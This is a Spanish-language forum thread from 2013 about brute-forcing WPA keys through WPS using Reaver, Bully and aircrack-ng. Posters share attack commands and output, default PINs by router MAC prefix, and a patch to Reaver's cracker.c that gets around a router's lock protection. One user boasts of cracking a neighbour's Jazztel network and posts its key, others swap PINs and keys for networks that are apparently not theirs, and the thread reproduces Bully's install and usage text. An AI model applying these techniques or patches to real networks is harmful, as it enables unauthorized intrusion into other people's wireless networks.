Como veréis,he seguido las dos vías posibles...en el mensaje de arriba aludía a reaver...voy por el 20 por ciento...a 13 sg por pin.
Otra cosa es poder hacerlo con un patrón para generar otro tipo de diccionario...por ej...si este tipo de routers tienen x números,o sólo letras...etc,etc,etc.
La mayoría de vosotros lo queréis por la cara...si leyéseis este post,sólo habría avances y no estancarse en un bucle que se reitera en el tiempo.
Reaver no da para más.
FIN


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 1 Mayo 2013, 17:04 pm
wpakill@MMXIII:~$ sudo aircrack-ng -w /home/wpakill/Escritorio/dicc.XXXX  /home/wpakill/Escritorio/hs-D0-AE-EC-XX-XX-XX.cap
Opening /home/wpakill/Escritorio/hs-D0-AE-EC-XX-XX-XX.cap
Read 2994 packets.

   #  BSSID              ESSID                     Encryption

   1  D0:AE:EC:EXXXX:XX  WLAN_XXXX                 WPA (1 handshake)

Choosing first network as target.

Opening /home/wpakill/Escritorio/hs-D0-AE-EC-XX-XX-XX.cap
Reading packets, please wait...

                                 Aircrack-ng 1.1 r2230
Passphrase not in dictionary

Esto es una captura de mi consola,obteniendo un Handshake de la red,creando un diccionario con wpamagickey y pasándole el aircrack-ng.
Peeeero..existe un problemilla,el wpamagick key no contempla esa MAC
y en la opción por ''defecto'' el resultado es obvio,a pesar del handshake.
CONCLUSIÓN
Al igual que Reaver,si no reúno los requisitos mínimos para utilizar los programas,como essid ó bssid compatibles,ó wps activado,ó chipset compatible...nunca obtendré resultados correctos.
Como veréis,he seguido las dos vías posibles...en el mensaje de arriba aludía a reaver...voy por el 20 por ciento...a 13 sg por pin.
Otra cosa es poder hacerlo con un patrón para generar otro tipo de diccionario...por ej...si este tipo de routers tienen x números,o sólo letras...etc,etc,etc.
La mayoría de vosotros lo queréis por la cara...si leyéseis este post,sólo habría avances y no estancarse en un bucle que se reitera en el tiempo.
Reaver no da para más.
FIN
Buenas, ese tipo de redes, las WLAN_XXXX con mac D0:AE:EC:XX:XX:XX, yo he sacado 4 por mi zona y el pin ha sido el mismo para todas. Cuando descifre la primera, me tardo no mas de 1 hora ya que el pin comienza por 0623, y cuando descifre las demas, solo tuve que poner el pin completo y me dieron la clave en 10 segundos. Nose si sera casualidad o esque timofonica no se a esmerado mucho.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 2 Mayo 2013, 09:58 am
OK...pero ya ha pasado reaver por ese nº....
Igualmente me ha pasado con otras redes de Vodafone...el mismo pin servía para algunos...y para otros no...imagino que será por ser el mismo modelo de Router.
Lo que hago es tirar de Reaver y guardar sesión.,para intentar retomarlo desde donde lo guardé.
Pero me da mucha pereza,ya que el entorno está casi ''reaverizado'' completamente,salvo este DO-AE-EC...
Adrihamel,ya puestos,podrías hacer la gracia y mandarme el pin completo por privado,a ver si con otras versiones de reaver consigo darle cera....
Pero realmente lo que importa es que este AP también se muestra vulnerable a Reaver por wps.
Curiosamente ese pin no aparece en la bb.dd,por eso decía que unos valen,otros no.
Salud


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 2 Mayo 2013, 15:17 pm
OK...pero ya ha pasado reaver por ese nº....
Igualmente me ha pasado con otras redes de Vodafone...el mismo pin servía para algunos...y para otros no...imagino que será por ser el mismo modelo de Router.
Lo que hago es tirar de Reaver y guardar sesión.,para intentar retomarlo desde donde lo guardé.
Pero me da mucha pereza,ya que el entorno está casi ''reaverizado'' completamente,salvo este DO-AE-EC...
Adrihamel,ya puestos,podrías hacer la gracia y mandarme el pin completo por privado,a ver si con otras versiones de reaver consigo darle cera....
Pero realmente lo que importa es que este AP también se muestra vulnerable a Reaver por wps.
Curiosamente ese pin no aparece en la bb.dd,por eso decía que unos valen,otros no.
Salud
claro te lo paso ahora por privado y pruebas, ademas, todos los routers que empiezan por los mismos digitos en la mac, (los 6 primeros numeros) no serian iguales en cuanto al router? supongo que todos los routers con mac DO-AE-EC tienen que tener el mismo pin o los 4 primeros numeros iguales ya que pertenecen a la misma compañia no?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: HalconEye en 2 Mayo 2013, 15:46 pm
exactamente....los seis primeros dígitos de la MAC corresponden a su fabricante...pero es posible que algunos routers lleven un firmware diferente...independientemente del fabricante


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: itek en 9 Mayo 2013, 21:19 pm
Buenas.

Me gustaría compartir algo que me he encontrado por la red y que no he visto por estos lares.

Se trata de Reaver para Mac OS X, totalmente funcional (probado en Mountain Lion). Al principio pense que no funcionaba, pero ni instalando Reaver en Ubuntu me funcionaba con ese router, por lo que las reacciones del programa son las mismas en ambos lados (a falta de confirmar, claro está).

Es capaz de poner la tarjeta wifi del mac (en mi caso un iMac 21,5) en modo monitor, por lo que hace su trabajo.

Os dejo el link de descarga de mi servidor ( http://www.itekcode.es/reaver-osx.zip ), os dejo el link donde me lo he encontrado y donde os podreis descargar el original ( https://code.google.com/p/reaver-wps/issues/detail?id=245 ).

Incluye wash y reaver, la instalacion es realmente sencilla en terminal y funciona exactamente igual que el de linux.

No se si esta en el lugar correcto pero me parecio un aporte interesante.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 10 Mayo 2013, 01:49 am
No estaba porque esto es  Wireless en Linux


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: itek en 12 Mayo 2013, 11:24 am
Vuelvo por aquí.

Hay algunas redes que tienen un modo de protección a este ataque, pero no de bloqueo...

Me explico:

Tengo en mis manos un router vodafoneXXXX con mac 30:87:30:XX:XX:XX, la cual no esta soportada por ningun generador automatico de claves, ni tiene pin por defecto 01234567.

El caso es que le pongo reaver a funcionar y SIEMPRE da error 0x03 (1 de cada 100 puede dar 0x02). Decir que tengo el punto de acceso muy cerca, por lo que no puede haber perdida de paquetes en si.

Debido a este error, se queda siempre probando el mismo pin.

En mi caso, he modificado el codigo fuente del reaver 1.4 (más concretamente el fichero cracker.c, mas abajo explico la modificacion).

De esta forma, aunque detecte uno de los errores el programa prueba el siguiente pin .

VENTAJAS: Creo que podria ser una forma de saltarse dicha proteccion, si encuentra un pin que le sirva quizá establezca comunicacion.

DESVENTAJA: Si el router está lejos, puede que ciertos errores sean debidos a problemas de comunicación y de esta forma podemos saltarnos el pin correcto.

De todas formas os dejo el código y ya vamos viendo ;)

Código:
//LINEA 209 de cracker.c, es el default de un Switch
default:
cprintf(VERBOSE, "[!] WPS transaction failed (code: 0x%.2X), trying next pin", result);
fail_count = 0;
pin_count++;
advance_pin_count();
break;

Para no entendidos:
Sustituimos desde el default hasta la proxima vez que veamos break (el break del default).

Basicamente actual igual que si la clave hubiese sido rechazada.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Danistov en 30 Mayo 2013, 18:14 pm
claro te lo paso ahora por privado y pruebas, ademas, todos los routers que empiezan por los mismos digitos en la mac, (los 6 primeros numeros) no serian iguales en cuanto al router? supongo que todos los routers con mac DO-AE-EC tienen que tener el mismo pin o los 4 primeros numeros iguales ya que pertenecen a la misma compañia no?

hola yo estoy e la misma situacion, podriais alguno pasarme ese pin por privado para comprobarlo? gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Devill en 1 Junio 2013, 18:28 pm
Estoy probando mi router tplink y cuando llega al 33.76% ya no avanza mas, se asocia con la red pero me sale todo el rato ahora tiempo agotado. Da igual con que pin pruebe, ya no avanza más. He probado a cambiarme la mac y nada. Si pruebo con otro router que tengo si que va probando pins ....

Alguien me puede decir que pasa?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 2 Junio 2013, 06:53 am
Pues lo de que se bloquea el router tendrás un mecanismo de defensa que hace que se bloque el router y no avance mas puede ser por eso, o también puede ser que te pille lejos la red que tu atacas y por eso no avanza prueba acercarte mas al router.Saludos :-\


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 3 Junio 2013, 21:55 pm
No se si os fijasteis, pero los que tengais ono y os hayan actualizado el firware del router automaticamente los de ono, han eliminado el wps de raiz o al menos yo no veo la opcion WPS por ningun sitio.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ChimoC en 4 Junio 2013, 10:44 am
Buenas:

@jose46lopez: Si, es cierto lo que dices (algun user de Granada ya me comentó que habían "tocado" el router)

Saludos

ChimoC


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 4 Junio 2013, 12:56 pm
Sip, a algunos amigos tambien les actualizaron ya. Se acabaron las pruebas de Reaver con Ono me parece a mi, el router en cuestion es el netgear cg3100d y la nueva version del firmware V1.04.02


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 4 Junio 2013, 17:51 pm
Yo hace tiempo descifre un router cisco de ono y sigue teniendo el wps activado. Aunque si es cierto que los netgear ya no tienen esa funcion, pero sabemos que la contraseña son 10 numeros, asique en descifrarlos no seria un gran problema siempre y cuando no cambien la contraseña de fabrica.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: puntillero en 7 Junio 2013, 14:12 pm
Se comenta mucho que 10 dígitos son "fáciles" de sacar. Varias veces he hecho referencia a que lleva mucho tiempo (incluso con aceleración gpu y equipos modernos) pasar diccionario de diez dígitos a un handshake, y no he tenido respuesta. Hacer tablas precompiladas lleva más tiempo que pasarle el aircrack, así que o se me cuenta cómo o sigo pensando que aquí se ponen comentarios de "cosas fáciles" a la ligera..

¿Podrías por favor poner datos de exactamente cómo lo haces y los tiempos que lleva hacerlo?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Bl4ck3lf en 7 Junio 2013, 21:23 pm
Que alguien diga que sacar una contraseña WPA por fuerza bruta es fácil, es una opinión personal. Personalmente odio ese método, y de hecho nunca me ha servido de nada. De todas maneras, si se sabe que la contraseña de un router es numérica con una longitud de 10 dígitos, tendrías que preparar un diccionario numérico con dicha longitud.

Citar
así que o se me cuenta cómo o sigo pensando que aquí se ponen comentarios de "cosas fáciles" a la ligera..

Podrías ahorrarte comentarios de esa índole.

Un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: roberwii en 8 Junio 2013, 02:23 am
Sip, a algunos amigos tambien les actualizaron ya. Se acabaron las pruebas de Reaver con Ono me parece a mi, el router en cuestion es el netgear cg3100d y la nueva version del firmware V1.04.02
se puede atacar,el problema en que solo te deja probar un pin ;(
aparte el reaver lleva desde el año pasado sin actualizarse,habra que sacar un parchecito! xD


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jose46lopez en 8 Junio 2013, 03:07 am
se puede atacar,el problema en que solo te deja probar un pin ;(
aparte el reaver lleva desde el año pasado sin actualizarse,habra que sacar un parchecito! xD

Pues la verdad no se si esto es cierto, por que dentro del router no aparece nada de WPS, y luego con wash -i no dice que tenga el wps activo. No se.

Yo lo de la fuerza bruta tampoco lo veo facil, pero tampoco use ninguna aplicacion para usar la gpu y esto, lo maximo que hice fue un dicc de 8 numeros, y tardaba la ostia y pase xDD


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: roberwii en 8 Junio 2013, 04:12 am
Pues la verdad no se si esto es cierto, por que dentro del router no aparece nada de WPS, y luego con wash -i no dice que tenga el wps activo. No se.

Yo lo de la fuerza bruta tampoco lo veo facil, pero tampoco use ninguna aplicacion para usar la gpu y esto, lo maximo que hice fue un dicc de 8 numeros, y tardaba la ostia y pase xDD

la gente utiliza script que usan como diccionarios.Ya que te crean la contraseña y no ocupa espacio,y depende de la red es de 8 o mas digitos.Las nuevas WLAN son de 20 caracteres entre numeros,mayusculas y minisculas,y las Ono son 10numeros.Por ejemplo...


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 10 Junio 2013, 13:30 pm
Bueno, traigo muy buenas noticias. Hace poco le instalaron a mi vecino un router de jazztel y como me gusta investigar pues mire si tenia el wps activado y no. Pero esta mañana, debe ser que lo activo y me sale esa red de jazztel como para hackearla por el reaver. Asi lo he echo. Tengo un programa que me dice los pines por defecto de los routers (no siempre fiable, pero por probar) y meti el pin 20172527 que me habia dado el programa y voala, clave descifrada. El router se llama JAZZTEL_DEXX y su mac es F8:8E:85:0A:DE:XX (los dos numeros finales concuerdan) y la clave es A281A39463BE285E4316. La he conseguido ya que el vecino ha activado el wps aunque en estos routers siempre suele venir desactivado. saludos y cualquier cosa me dejan un mp.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: .::MaGiAc::. en 17 Junio 2013, 02:41 am
Bueno, traigo muy buenas noticias. Hace poco le instalaron a mi vecino un router de jazztel y como me gusta investigar pues mire si tenia el wps activado y no. Pero esta mañana, debe ser que lo activo y me sale esa red de jazztel como para hackearla por el reaver. Asi lo he echo. Tengo un programa que me dice los pines por defecto de los routers (no siempre fiable, pero por probar) y meti el pin 20172527 que me habia dado el programa y voala, clave descifrada. El router se llama JAZZTEL_DEXX y su mac es F8:8E:85:0A:DE:XX (los dos numeros finales concuerdan) y la clave es A281A39463BE285E4316. La he conseguido ya que el vecino ha activado el wps aunque en estos routers siempre suele venir desactivado. saludos y cualquier cosa me dejan un mp.

Que programa usas para ver los pines por defecto?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Tielo01 en 19 Junio 2013, 20:32 pm
Hola.
Estoy probando el reaver con una WLAN_XXXX y tras finalizar he conseguido que me de el pin pero no la clave. ¿Por qué puede ser? ¿Cómo conseguir la clave?
No estoy muy puesto en esto.. jeje
Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 20 Junio 2013, 06:29 am
Te importa pasarme esos datos de esa WLAN_XXXX por privado haber si te puedo ayudar.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Sprocet39 en 20 Junio 2013, 18:56 pm
¿Alguien sabe sobre pin de 30:87:30:xx:xx:xx, ?es de vodafone, supongo que son routers nuevos.
porque no vi nada por ningun sitio.
Gracias de antemano y un saludo



se me olvidaba, el pin que me da goyscript wps por defecto no es valido, y por fuerza bruta me da error y siempre repite pin 12345670, 0% siempre.aunque el router no bloque ap por ataque masivo, creo que si pongo los 4 primeros digitos no tendré problema.

Un saludo y gracias


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: gej en 23 Junio 2013, 04:55 am
hola, al cabo de 16 dias sin descanso he sacado mi clave wpa, el router es un tp link wr841n,la mac F8:D1:11:XX:XX:XX de cableworld

hola como estas estoy intentando auditar mi router es igual que el tuyo lo unico que al utilizar reaver se bloquea al lanzar 10 pines y me veo forzado a reiniciarlo. Me podrias asesorar en los comandos que utilizaste para que no se bloquee.
Desde ya muchas gracias saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: SINSEMILLA en 23 Junio 2013, 23:31 pm
hola yo tengo una Vodafone y no se como echarle el diente, si me pudieran ayudar el reaver, no pasa del 90.91 porciento, no se que hacer
tengo el wifislax 4.4 y el wifiway ultimo


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 27 Junio 2013, 22:19 pm
Tengo una wlan_xxxx con mac A4:53:6F:XX:XX:XX ya he sacado el pin y la clave pero cuando voy a poner la clave en windows, me sale que no se pudo conectar a la red. He probado con otro programa que viene con ralink para poner el pin y meto el pin y nada, sale como conectando y la clave es esa y el pin es ese porque he relaizado el ataque y me sale todo correcto y no tiene filtrado mac porque me puedo autentificar bien. Alguna ayuda?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: wyxchari en 7 Julio 2013, 09:32 am
Por otra parte lo he intentado con el minidwep que viene en el wifislax que habia utilizado para las wep, pero nunca para reaver y me surge la duda de que cuando le quiero cambiar las tools me dice esto
Sort pincodes in sequences u like only 10 digit numbers accepted. 0 means 0000-0999. 1 means 1000-1999
y me deja un numero tal que así 7896543210
Que tengo que poner para q me coloque el pin que yo quiera o los 4 primeros digitos del pin que yo quiera

Gracias...Saludos
- minidwep: Sort pincodes: vale para indicar el pin inicial de forma burda. Obligatoriamente hay que poner 10 dígitos numéricos en orden tal que así:
Si queremos que empiece en el 0000 ponemos 0123456789
Si queremos que empiece en el 1000 ponemos 1234567890
Si queremos que empiece en el 2000 ponemos 2345678901
Si queremos que empiece en el 3000 ponemos 3456789012
...
Si queremos que empiece en el 9000 ponemos 9012345678.

= Continuar sesion de reaver sin haber grabado la sesion pero recordamos los 4 primeros dígitos del PIN por el que iba:
  - Ponemos reaver.
  - Esperamos a que pase del PIN inicial.
  - Damos CRTL+C para pararlo.
  - Editamos /etc/reaver/*.wpc
  - Buscar el PIN que queremos en el listado.
  - Fijarse en el número de línea.
  - Restarle 4 al número de línea (restar 8 para la línea 2 en caso de querer también especificar el resto del PIN).
  - Ponerlo en la línea 1.
  - Salvar el *.wpc
  - Poner reaver de nuevo y preguntará si queremos continuar sesión.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: popeye7 en 8 Julio 2013, 08:50 am
Buenas ,¿podrías decirme de donde has sacado esas información ? . Los pins que aparecen en tu respuesta son de 10 dígitos   ¿como saldrían los de ocho cifras ?.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luni en 8 Julio 2013, 13:43 pm
Muy buenas tardes!! estoy trabajando con el reaver, tras ver que tengo wps activado, pero se me queda en sending identity response y no avanza, ¿que puede ocurrir?
Saludos.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 8 Julio 2013, 14:21 pm
Luni: Eso quiere decir Enviaando respuesta de identidad o una de dos esta esperando a que se te asocie tu router con el del cliente o :silbar:sea tu router y por eso esta esperando el mensaje del otor router, también puede ser que tenga lejos el router y no te asocie bien si no me equivoco.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luni en 8 Julio 2013, 14:26 pm
pues si, la verdad que la señal es bastante buena, no debería quedarse mucho tiempo parado no?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 8 Julio 2013, 14:42 pm
 Entonces te llega buena señal y se te asocia o te sale ese mensaje derrepente ?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: luni en 8 Julio 2013, 15:59 pm
se asocia, pero se queda en ese mensaje y no hace nada mas, no se quizas deberia dejarlo más tiempo, pero como antes no me habia pasado me ha parecido algo extraño


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 8 Julio 2013, 16:34 pm
luni: A que distancia mas o menos te pones de tu router si te pones muy cerca es normal que te envie ese mensaje lo normal seria que te alejaras un poco mas de ese router y esperes a que se asocie y espere que te envi los M1,M2,M3,M4 hasta que vaya avanzando solo haber si tienes suerte por curiosidad que red es nombre de la red ? saludos


Título: por favor me das el pin de orange 00:19:70 para prbar
Publicado por: jeery en 9 Julio 2013, 14:10 pm
He probado una orangexxxx con mac 00:19:70 y a los 10 pines que manda se bloquea y tardo 5 días en desbloquearse pero a los 6 días puse reaver -i mon0 -b 00:19:70:xx:xx:Xx -c x -e orangexxxx -p 64xxxxxx -vv y parece increíble pero me a soltado la clave en 29 segundos. La clave es de 26 dígitos, todo números del 0 al 9 excepto 6 letras mayúsculas y 2 minúsculas intermezcladas. No se repite mas de 3 números y letras seguidas y de los 8 números del pin solo 6 pertenecen a la clave. Desde el 6 numero asta el 11 el el primer numero del pin desde el 17 al 22 segundo numero del pin. Osea que la clave quedaría
yxYxYXXXXXXxYxYxXXXXXXxYYy Las y minúscula son las letras en minuscula, las x minúsculas son números al azar, las Y en mayúsculas son las letras en mayúscula y las x en negrita es el pin Creo que no me e equivocado en la clave cualquier cosa me lo decis por MS salu2 y espero que os sirva mi respuesta.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 9 Julio 2013, 18:46 pm
Hola, como podria averiguar la clave wpa mediante el codigo pin? un saludo.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 10 Julio 2013, 12:31 pm
He conseguido la clave de una Orange-XXXX con mac 84:9C:A6:XX:XX:XX. Os dejo una captura con los dos primeros digitos de la clave. Si quereis datos mandadme un mp. Salu2 http://www.subirimagenes.com/privadas-instantnea1-2094505.html


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 10 Julio 2013, 14:53 pm
adrihamel : Te importa mandarme la captura completa de esa Orange-xxxx donde salga la clave la mac y el pin por lo que veo en la imagen has conseguido la clave con un diccionario verdad, me imagino que lo habras conseguido con el script de 1camaron1 verdad bueno estas Orange si se sabian ya pero con otras seguimos igual.Saludos ;)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 10 Julio 2013, 16:21 pm
adrihamel : Te importa mandarme la captura completa de esa Orange-xxxx donde salga la clave la mac y el pin por lo que veo en la imagen has conseguido la clave con un diccionario verdad, me imagino que lo habras conseguido con el script de 1camaron1 verdad bueno estas Orange si se sabian ya pero con otras seguimos igual.Saludos ;)
Pues si, la saque con el script de 1camaron1 y en menos de una hora he conseguido la clave. Tiene el wps activado pero entrando en el router no veo donde sale el pin. Es un livebox. Ahora te paso la mac el nombre y la clave de este router.


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: ps3ps3ps3 en 10 Julio 2013, 17:55 pm
Hola, podriais hecharme una manita si no os importa? os lo agradezco..


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 11 Julio 2013, 00:28 am
ps3ps3ps3: Tu pregunta no la entiendo bien que quieres saber ser directo en lo que vas a preguntar si quiere que lo demás te ayudemos.Saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: jeery en 11 Julio 2013, 18:21 pm
el tiempo de consequir qual es .......


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 12 Julio 2013, 12:31 pm
el tiempo de consequir qual es .......

Te refieres a auditar una red con el reaver?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: Sujo1111 en 16 Julio 2013, 17:23 pm
Crtl+c mientras prueba los pins y se para,y luego volver a poner reaver - i mon0 -b .... -vv ??
Gracias lo pruebo ahora mismo,y para guardar el progreso aun que apague el pc sabes alguna forma? Gracias!  :)

Tu pulsas Ctrl+C y ya después puedes hacer cualquier cosa, ya sea cerrar todo apagar el PC, que a la siguiente vez que lanzes el reaver te pondrá "Restore previous session? Y/n"


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: TDKMAS en 19 Julio 2013, 19:01 pm
Hola!

He visto el tutorial en youtube sobre Reaver:

http://www.youtube.com/watch?v=mZLKbHmutBg

He seguido todos los pasos y al final me sale ésto:

Waiting for bacon from (BSSID)
Switching mon0 to channel 6
WARNING: Failed to associate with (BSSID) (ESSID: ESSID)
WARNING: Failed to associate with (BSSID) (ESSID: ESSID)
WARNING: Failed to associate with (BSSID) (ESSID: ESSID)
WARNING: Failed to associate with (BSSID) (ESSID: ESSID)
UNA Y OTRA VEZ...

He comprobado que el WPS estaría activado tal cómo explica el tutorial, estaba en (0x02)

Que ocurre?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: GOolden en 19 Julio 2013, 20:17 pm
Hola tdkmas usa este comando reaver -i tarjeta -b mac de la red -vv y me cuentas porcierto con que redes estas probando dime las mac saludos


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: adrihamel en 21 Julio 2013, 17:25 pm
Hola!

He visto el tutorial en youtube sobre Reaver:

http://www.youtube.com/watch?v=mZLKbHmutBg

He seguido todos los pasos y al final me sale ésto:

Waiting for bacon from (BSSID)
Switching mon0 to channel 6
WARNING: Failed to associate with (BSSID) (ESSID: ESSID)
WARNING: Failed to associate with (BSSID) (ESSID: ESSID)
WARNING: Failed to associate with (BSSID) (ESSID: ESSID)
WARNING: Failed to associate with (BSSID) (ESSID: ESSID)
UNA Y OTRA VEZ...

He comprobado que el WPS estaría activado tal cómo explica el tutorial, estaba en (0x02)

Que ocurre?
Ami eso me pasaba con las de telefonica (8C:0C:A3) y con cualquier comando en reaver me salia siempre el WARNING. Al final opte por el comando reavermod y ya iba como un tiro. Si este es tu caso prueba con el comando reavermod -i tarjeta -b mac de la red -vv


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: El_Andaluz en 21 Julio 2013, 19:42 pm
Compañeros descargarse la ultima versión del wifislax4.6 rc1 yo la he probado y demomento no da problemas.Saludos espero que me vuelvan abrir el tema de patrones de pines por culpa de uno pagamos todos. ;) :silbar:

Buenas, por tu forma de hablar y expresarte es por lo que se te cierra el post (por favor, no mezcles temas, si tienes alguna queja habla con algun Moderador Global o Admin


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: gabrielprocs en 31 Julio 2013, 16:07 pm
cual es el metodo mas efectivo este o el de diccionario, cuanto puede tardar? con cual optuvieron mejores resultados?


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 5 Agosto 2013, 03:04 am
Nuevos Routers Nisuta con MAC Address de Tenda:

(http://repositorio2.masoportunidades.com.ar/ARG01/196/196/10504582/fotos//10504582_3_2011413_0_29_58.jpg)

Datos:

(http://i.minus.com/i0keHdSResPMY.jpg)

PIN WPS = WPA-AES

Modelo Original de Tenda:

(http://www.evoltapc.cl/images/fotos/WIFI/W311R2.jpg)


Título: Re: REAVER: Vulnerabilidad de WPA por WPS habilitado
Publicado por: P4nd3m0n1um en 8 Agosto 2013, 03:14 am
(http://i.minus.com/ibaA4s71EIDj9U.png)

Google CODE: http://code.google.com/p/bully/ (http://code.google.com/p/bully/)
GitHUB: https://github.com/bdpurcell/bully  (https://github.com/bdpurcell/bully)

PANORAMA GENERAL

Bully es una nueva implementación de ataque de fuerza bruta WPS, escrito en C. Es conceptualmente idéntica a otros programas similares, ya que aprovecha la (ahora bien conocidos) los fallo de diseño en la especificación WPS. Tiene varias ventajas sobre el código original de Reaver-WPS. Estos incluyen un menor número de dependencias, la mejora de la memoria y el rendimiento de la CPU, correcta manipulación de orden de bytes, y un conjunto más robusto de opciones. Se ejecuta bajo entornos de Linux, y ha sido desarrollado específicamente para funcionar en sistemas Linux embebidos (OpenWrt, etc), independientemente de la arquitectura.

Bully proporciona varias mejoras en la detección y el manejo de escenarios anómalos. Se ha probado con los puntos de acceso de numerosos proveedores, y con diferentes configuraciones, con mucho éxito.

DEPENDENCIAS

Bully requiere libpcap y libssl. Se utiliza la funcionalidad WPS escrito por Jouni MALINEN; que el código fuente está incluido en esta reproducción de la simplicidad, como son libcrypto y varias otras fuentes que proporcionan la funcionalidad necesaria.

Debido a que Bully almacena los pins aleatorios y los datos en archivos normales de sesión, no hay necesidad de ninguna funcionalidad de base de datos.

INSTALACIÓN

Bully puede ser construido e instalado ejecutando:

Código:
cd bully-master
cd src
sudo make
sudo make install

INSTALACIÓN BAJO INSTALACIÓN

Un Makefile probado en Kamikaze r18801 (2.6.26) se proporciona en el directorio raíz del repositorio. Trasladar a Backfire u otra variante OpenWrt debería ser bastante sencillo.

Código:
Assuming you have ~/kamikaze as your openwrt directory and ~/bully for bully, the following steps should get you up and running:
cd ~/kamikaze
mkdir package/bully
cp -rf ~/bully/* ~/kamikaze/package/bully
make menuconfig


Código:
Navigate to Network-->wireless and select bully (module or built-in), exit and save. If you elected to build as a package, type
make package/bully/{clean,compile} V=99
scp bin/packages/<arch>/bully_1.1-1_<arch>.ipk root@<router-ip>/tmp
ssh root@<router-ip>


Código:
enter router password,
opkg install /tmp/bully*ipk


Si decide construir Bully en su firmware, e instalarlo como lo haría normalmente.

USO

Asegúrese de que usted es un usuario root, y están utilizando hardware inalámbrico que es capaz de inyección con una interfaz en modo monitor.

Código:
usage: bully <options> interface
Required arguments:
  interface      : Wireless interface in monitor mode (root required)
  -b, --bssid macaddr    : MAC address of the target access point
Or
  -e, --essid string     : Extended SSID for the access point
Optional arguments:
  -c, --channel N[,N...] : Channel number of AP, or list to hop [b/g]
  -l, --lockwait N       : Seconds to wait if the AP locks WPS   [43]
  -p, --pin N            : Index of pin to start at (7 digits) [Auto]
  -s, --source macaddr   : Source (hardware) MAC address      [Probe]
  -v, --verbosity N      : Verbosity level 1-3, 1 is quietest     [3]
  -w, --workdir          : Location of pin/session files  [~/.bully/]
  -5, --5ghz             : Hop on 5GHz a/n default channel list  [No]
  -F, --fixed            : Fixed channel operation (do not hop)  [No]
  -S, --sequential       : Sequential pins (do not randomize)    [No]
  -T, --test             : Test mode (do not inject any packets) [No]
Advanced arguments:
  -a, --acktime N        : Acknowledgement and pcap timeout (ms) [25]
  -r, --retries N        : Resend packets N times when not acked  [2]
  -m, --m13time N        : M1/M3/Initial beacon timeout (ms)   [2000]
  -t, --timeout N        : Timeout for Auth/Assoc/Id/M5/M7 (ms) [200]
  -1, --pin1delay M[,N]  : Delay M seconds every Nth nack at M5 [0,1]
  -2, --pin2delay M[,N]  : Delay M seconds every Nth nack at M7 [5,1]
  -A, --noacks           : Disable ACK check for sent packets    [No]
  -C, --nocheck          : Skip CRC/FCS validation (performance) [No]
  -D, --detectlock       : Detect WPS lockouts unreported by AP  [No]
  -E, --eapfail          : EAP Failure terminate every exchange  [No]
